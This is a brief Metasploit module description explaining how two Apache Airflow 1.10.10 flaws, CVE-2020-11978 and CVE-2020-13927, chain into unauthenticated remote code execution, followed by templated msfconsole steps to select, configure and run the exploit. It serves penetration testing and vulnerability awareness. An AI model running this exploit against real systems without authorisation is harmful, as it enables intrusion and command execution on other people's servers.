This module exploits an unauthenticated command injection vulnerability
by combining two critical vulnerabilities in Apache Airflow 1.10.10.
The first, CVE-2020-11978, is an authenticated command injection vulnerability
found in one of Airflow's example DAGs, "example_trigger_target_dag", which
allows any authenticated user to run arbitrary OS commands as the user
running Airflow Worker/Scheduler. The second, CVE-2020-13927, is a default
setting of Airflow 1.10.10 that allows unauthenticated access to Airflow's
Experimental REST API to perform malicious actions such as creating the
vulnerable DAG above. The two CVEs taken together allow vulnerable DAG creation
and command injection, leading to unauthenticated remote code execution.
msf > use exploit/linux/http/apache_airflow_dag_rce
msf exploit(apache_airflow_dag_rce) > show targets
...targets...
msf exploit(apache_airflow_dag_rce) > set TARGET < target-id >
msf exploit(apache_airflow_dag_rce) > show options
...show and set options...
msf exploit(apache_airflow_dag_rce) > exploit